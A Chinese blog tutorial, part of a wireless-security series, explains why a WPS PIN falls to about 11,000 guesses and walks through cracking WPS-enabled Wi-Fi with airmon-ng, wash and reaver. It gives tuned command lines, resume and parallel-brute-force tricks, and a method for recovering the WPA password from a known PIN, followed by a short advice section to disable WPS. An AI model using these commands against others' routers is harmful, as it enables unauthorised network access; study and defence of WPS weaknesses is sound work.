无线安全专题_破解篇02--kali破解pin码
最近项目有点紧,所以本应该上周发的文章,拖到了本周三,在此说声抱歉。无线安全专题,我打算系统地写六个部分,分别为破解篇,攻击篇,欺骗篇,路由篇,移动篇和蓝牙篇,当然在发布的过程中,可能还会掺杂着发布flask的教程,分享我的个人博客框架。(我的新书《Python爬虫开发与项目实战》出版了,大家可以看一下样章)
上一篇咱们说到了破解篇的第一课:kali破解WPA,今天我们要说的是通过破解pin码,来获取开启wps功能的wifi密码。
路由器开启wps功能后,会随机生成一个8位的pin码,通过暴力枚举pin码,达到破解的目的,尤其现在很多路由器默认开启了wps功能。大家可能会想到8位的随机pin码将会有100000000种情况,这要pin到何年何月呀。。。。。。不过接下来讲解一下原理,大家会发现其实没多少种情况,这也是这种攻击方式比较流行的原因。
1.pin码破解的原理:
pin码是由8位纯数字组成的识别码,pin码破解是分三部分进行的,规律是这样的:pin码分为三部分,如图:
前4位为第一部分,第5-7位为第二部分,最后1位为第三部分。第一部分的验证跟第二部分没关联,最后1位是根据第二部分计算得出的校验码。
破解一开始是先单独对第一部分进行pin码匹配,也就是说先破解前4位pin码。前4位是0000-9999总共10000个组合。
当前4位pin码确定后再对第二部分进行pin码匹配,也就是再对5-7位进行破解,5-7位是000-999总共1000个组合。
当前7位都确定后,最后1位也会自动得出,破解完成。
根据pin码破解的原理,可以看到只需要枚举11000种情况就会必然破解出pin码,从而通过pin得到wifi密码。
2.PIN码爆破:
讲解明白原理,接下来开始使用工具爆破pin码,无线专题我们都是基于kali2.0的操作系统,无线网卡采用的是WN722N。
爆破pin码的前提是路由器开启了WPS功能,首先咱们要做的是发现发现开启WPS功能的wifi。
将网卡切换到监听模式: airmon-ng start wlan1,如果监听模式切换失败,请看第一篇的内容。
在命令行中输入:wash -i wlan1,扫描开启wps的wifi设备。WPS Locked为No的都可以爆破试试。
找到了开启WPS的wifi,接下来咱们就可以进行pin码爆破,下面主要说一下reaver工具。
reaver 命令:
reaver命令参数:
- -i 监听后接口名称
- -b 目标mac地址
- -a 自动检测目标AP最佳配置
- -S 使用最小的DH key(可以提高PJ速度)
- -vv 显示更多的非严重警告
- -d 即delay每穷举一次的闲置时间 预设为1秒
- -t 即timeout每次穷举等待反馈的最长时间
- -c 指定频道可以方便找到信号,如-c1 指定1频道
示例:
reaver -i mon0 -b MAC -a -S –d9 –t9 -vv)
应因状况调整参数(-c后面都已目标频道为1作为例子)
目标信号非常好: reaver -i mon0 -b MAC -a -S -vv -d0 -c 1
目标信号普通: reaver -i mon0 -b MAC -a -S -vv -d2 -t 5 -c 1
目标信号一般: reaver -i mon0 -b MAC -a -S -vv -d5 -c 1
选择之前扫描出来的开启WPS的wifi,选择一个进行破解。
输入:reaver -i wlan1 -b 54:E6:FC:35:C5:82 -S -N -vv -c 4
在穷举的过程中,reaver会生成以路由mac地址为名的wpc文件,这个文件在kali系统中/etc/reaver/文件夹下。
一时半会pin不出来,过段时间pin的时候命令加参数 -s file.wpc,就会根据之前的进度继续pin。
3.注意点:
1.一般reaver 前四位默认是从0开始,如果想从指定的数值开始爆破需要添加-p参数:-p 9000,这个意思就是从9000开始,只要不pin死路由器,可以多开几个窗口,从不同的数值开始。
2.最后pin完最后会显示WPS PIN(正确的pin码)和WPA PSK(wifi密码),同时如果WPS功能没关,pin码没修改,无论怎样修改密码,都可以通过pin码获取wifi密码: reaver -i mon0 -b mac -p pin码,来再次得到密码
3.一般pin的过快,会把路由器pin死,所以一般还会加上-d5 -t5参数,添加5秒延时,当然数值可以自己改。
4.防范措施:
1.WPS功能对个人基本上没啥作用,还是关了吧。
2.现在的路由一般会有防pin措施,例如会有300秒pin限制,但这个是伪防pin,作用不是很大。它设置时间间隔,正好防止我们把路由器pin死。所以还是把WPS功能关了,不要过分相信防pin措施,毕竟只有11000种情况,早晚会破解。
今天的分享就到这里,下一篇继续分析。如果大家觉得还可以呀,记得推荐呦。
欢迎大家支持我公众号:
本文章属于原创作品,欢迎大家转载分享。尊重原创,转载请注明来自:七夜的故事 http://www.cnblogs.com/qiyeboy/
转载于:https://www.cnblogs.com/qiyeboy/p/5825525.html
无线安全专题_破解篇02--kali破解pin码相关推荐
- 时间管理专题_软件篇02
本文属非商业用途,文中借鉴他人处均已注明出处,若侵犯原作权益,请联系删除,谢谢 接上一篇 时间管理专题_软件篇01 #NOTE要点:神文,从目标管理到时间统计完整流程,作者亲历 要点:此文过猛, 引用 ...
- 时间管理专题_软件篇03
本文属非商业用途,文中借鉴他人处均已注明出处,若侵犯原作权益,请联系删除,谢谢 接上一篇 时间管理专题_软件篇02 标题:一年多的GTD和自我管理之路(上) 作者:褪墨・时间管理 地址:http:// ...
- 无线安全专题_破解篇03--打造个人字典
上一篇讲解了如何通过Kali破解Pin码,今天继续无线安全专题破解篇的第三讲:打造个人字典.通过第一课,我们知道想要破解WPA加密,需要一个强大的字典.字典的强大直接决定了破解的可能性,废话不多 ...
- GOOGLE ADSENSE广告联盟收不到PIN码_快速表单身份验证PIN码方法
在自己的网站或者博客上投放Google Adsense广告是目前很多站长不错的赚钱途径.尤其是Google Adsense不仅单价高.而且信誉好.支付稳定等天然优势让国内众多广告联盟黯然失色.在流量有 ...
- 时间管理专题_理论篇
本文属非商业用途,文中借鉴他人处均已注明出处,若侵犯原作权益,请联系删除,谢谢 简介 总感觉时间不够用,一方面确实没闲着,另一方面又找不到有那方面的巨大收获.之前接触过时间管理,但是不曾认真的总结过. ...
- 时间管理专题_软件篇01
本文属非商业用途,文中借鉴他人处均已注明出处,若侵犯原作权益,请联系删除,谢谢 简介 时间管理软件筛选 #NOTE要点:较旧,2012年整理的了 ,App软件为主,偏重GTD,目标管理和统计较弱,具体 ...
- 关于pin码破解的原理和reaver参数的解释
路由器开启wps功能后,会随机生成一个8位的pin码,通过暴力枚举pin码,达到破解的目的,尤其现在很多路由器默认开启了wps功能.大家可能会想到8位的随机pin码将会有100000000种情况,这要 ...
- 无线设备的破解和安全(破解篇)
很多人都向往不要钱免费上网--,这也是无线网络破解越来越普及的原因,针对急切想破解他人无线网络进行蹭网的朋友,希望以下的文章对您有用.但就个人而言还是不太建议您蹭网的,特别是不要蹭我家的网 -- 破解 ...
- kali破解WiFi时wlan0没有变wlan0mon_黑客入门干货:黑客使用 Aircrack-ng 破解 Wi-Fi 密码
1.首先请不要使用此方法去搞破坏,去蹭Wi-Fi,我认为技术本身的价值很大,尤其是在学习这个技术的过程中解决遇到的问题,当经过重重困难最后终于成功之后的喜悦又怎么能拿去蹭网呢.我在此过程中都是用自己路 ...
最新文章
- Web 服务器-Apache详解
- 手把手教你如何用黑白显示器显示彩色!
- 2018-2019-1 20165325 20165320 20165337 实验二 固件程序设计
- python画函数曲线-python画蝴蝶曲线图的实例
- RequestDispatcher
- linux搭建宝塔重启mysql_宝塔面板安装 重启等命令linux系统重启
- 关于编译GITHUB上的工程
- java 预览zip_java压缩包上传,解压,预览(利用editor.md和Jstree实现)和下载
- Qt入门之常用qt控件认知之QLabel
- B系列台达服务器解密码步骤,台达HMI解密,DOP-A解密,DOP-B解密,文件密码解密
- c++如何实现对硬盘的操作_Python 小技巧:如何实现操作系统兼容性打包?
- Go基础-Go中的import
- Android通讯录(一)
- hololens发布修改工程名字
- 云课堂智慧职教计算机作业答案,云课堂智慧职教毛概作业答案
- 困扰我两天的问题(nginx配置好ssl证书,https却不能访问)
- 高等数学--集合概念
- php 图形库 锯齿,PHP imageantialias – 是否使用抗锯齿(antialias)功能 | 菜鸟教程...
- 2014-2022年4月全国空气质量数据分析
- 映美Jolimark CFP-535G 打印机驱动
热门文章
- python装饰器,迭代,异常
- Windows Terminal在设置里把窗口模式改成专注以后要怎么调回来
- 室内小间距P1.2及P1.5超清LED大屏显示效果和应用场所
- 聚观早报|特斯拉向第三方电动车开放充电桩;Epic 诉苹果垄断败诉
- php高危漏洞,thinkphp高危漏洞修复--因控制器任意实例化产生的注入漏洞
- VUE 动态构建混合数据Treeselect选择树,同时解决巨树问题
- 蓝牙RSSI定位入门到精通(3)-指纹法实现
- P2014 [CTSC1997] 选课(树形dp)
- 华为云DevCloud深色模式开发解读
- Android 挂逼 修炼之行---解析公众号文章消息和链接文章消息如何自动打开原理